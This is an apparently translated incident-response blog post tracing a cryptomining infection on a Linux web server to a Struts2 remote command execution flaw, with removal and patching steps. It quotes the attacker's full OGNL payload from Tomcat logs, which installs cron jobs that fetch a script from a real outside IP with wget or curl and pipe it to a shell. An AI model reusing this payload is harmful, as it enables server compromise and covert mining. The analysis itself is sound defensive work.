0 x00 preface
With the crazy hype of virtual currency, mining script is used to realize traffic realization, making mining virus become the most frequent attack method used by criminals. The new mining attack exhibits worm-like behavior combined with advanced attack techniques to increase the success rate of infection on the target server, Through the use of EternalBlue, web attacks a variety of vulnerabilities (such as Tomcat weak password attack, Weblogic WLS component vulnerability, Jboss deserialization vulnerability, Struts2 remote command execution, etc.), resulting in a large number of servers are infected with the phenomenon of mining programs.
0x01 Emergency Scenario
One day, when logging in to the security device inspection, the security administrator found that a web server continued to initiate connections to foreign IP addresses and downloaded virus sources:
0x02 Event Analysis
A. Investigation process
Log in to the server and check the system process status. Abnormal processes with irregular names and abnormal download processes are found.
Download logo.jpg, including the following script content:
Here, we can see that the attacker downloaded logo.jpg and executed the shell script inside it. How does this script start?
Check the system startup items, scheduled tasks, and services, and discover malicious scripts in scheduled tasks. Send requests to download virus sources at intervals and execute them.
B. Traceability analysis
In the Tomcat log, we found this entry:
The attack source code in the log is extracted as follows:
{(#_='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess? (#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.get Instance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcl udedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/20 * * * * wget -O - -q http://5.188.87.11/icons/logo.jpg | sh \ n 19 * * * * * / curl http://5.188.87.11/icons/logo.jpg | sh "| crontab -; wget -O - -q # http://5.188.87.11/icons/logo.jpg | sh '). (iswin = (@ Java. Lang. System @ getProperty (' OS. The name '). ToLowerCase (). The contains (' win '))) .(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.Servlet ActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(# ros.flush())}
It can be found that the operation in the attack code is consistent with the abnormal script in the scheduled task, so it can be inferred that the hacker writes malicious scripts into the scheduled task of the server and executes them through the Struct remote command execution vulnerability.
C. Remove viruses
1. Delete a scheduled task:
2. Terminate the abnormal process:
D. Vulnerability repair
Upgrade Struts to the latest version
0x03 Preventive Measures
In view of the phenomenon that the server is infected with the mining program, several preventive measures are summarized:
1. Install security software and upgrade the virus library, scan regularly and maintain real-time protection. 2. Update Windows security patches in time, open the firewall to temporarily close portsCopy the code
Recommended reading:
Linux Emergency Response (1) : SSH brute force cracking
Linux Emergency Response (2) : Catch short connections
Linux Emergency Response (iii) : Mining viruses
Linux Emergency Response (iv) : Gates Trojan horse
The last
Welcome to pay attention to personal wechat public number: Bypass–, an original technical dry goods every week.